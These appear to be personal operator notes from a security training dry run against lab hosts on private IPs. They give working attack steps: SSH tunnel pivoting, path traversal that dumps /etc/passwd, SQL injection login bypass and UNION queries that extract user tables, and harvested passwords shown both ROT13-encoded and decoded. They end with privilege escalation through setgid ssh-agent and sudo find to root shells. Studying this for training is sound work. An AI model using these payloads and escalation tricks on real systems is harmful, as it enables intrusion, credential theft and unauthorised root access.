Security DryRun OpNotes

10.50.35.10(user2) 22,80
192.168.28.181		
192.168.28.172(Aaron) - 22,7008
192.168.28.190	
192.168.28.179

TUNNELS
	ssh -MS /tmp/user2 user2@10.50.35.10
	ssh -S /tmp/user2 -O forward -L 2000:192.168.28.181:80 dummy
	ssh -S /tmp/user2 -O forward -L 2001:192.168.28.181:22 dummy
	ssh -S /tmp/user2 -O forward -L 2002:192.168.28.172:22 dummy
		ssh -MS /tmp/Aaron Aaron@127.0.0.1 -p2002

go to webpage on firefox
	go to career profile page
			it says "myfile="
				after the =
					../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin sshd:x:109:65534::/run/sshd:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false user2:x:1001:1001::/home/user2:/bin/sh

username = user2

in login prompt box 
	'or 1='1 

Array ( [0] => user2 [name] => user2 [1] => RntyrfVfNER78 [pass] => RntyrfVfNER78 ) 1Array ( [0] => user3 [name] => user3 [1] => Obo4GURRnccyrf [pass] => Obo4GURRnccyrf ) 1Array ( [0] => Lee_Roth [name] => Lee_Roth [1] => anotherpassword4THEages [pass] => anotherpassword4THEages ) 1

ROT13 Encoded so decode them for the actual password





user 2:EaglesIsARE78
10.50.35.10
	cat /etc/hosts
		192.168.28.181 WebApp
	find / -type f -perm /2000 2>/dev/null
		find one that is breakable in this case its ssh-agent
			/usr/bin/ssh-agent /bin/bash -p




make a dynamic tunnel to the multi socket connection and proxychain nmap scan the ip we just found
	we find 22 and 80. Create tunnels to both
ssh -S /tmp/user2 -O forward -L 2000:192.168.28.181:80 dummy

on the http website
find what radial button has more to offer
	UNION SELECT 1,2,3 
		until it gives you a hidden item, in this case its ham
			pay attention to order they appear in.
				this one is 1 3 2
run the golden rule, find the table names and such
	1 UNION select comment,mime,id FROM sqlinjection.share4;#
UNION SELECT $user_id,$name,$username FROM siteusers.users
	1 	ncnffjbeqlCn$$jbeq 		$Aaron
	2 	RntyrfVfNER78 			$user2
	3 	Obo4GURRnccyrf 		$user3
	4 	anotherpassword4THEages 	$Lroth


user3:Bob4THEEapples




Lroth:anotherpassword4THEages
192.168.28.179
22
3389
9999


Aaron:apasswordyPa$$word
	192.168.28.172
		find / -type f -perm /2000 2>/dev/null
		find one that is breakable in this case its ssh-agent
			/usr/bin/ssh-agent /bin/bash -p
	sudo -l
		we have /usr/bin/find sudo privs
			go to GTFObins
				find
					sudo find . -exec /bin/sh \; -quit
						/bin/bash -p for a bash shell


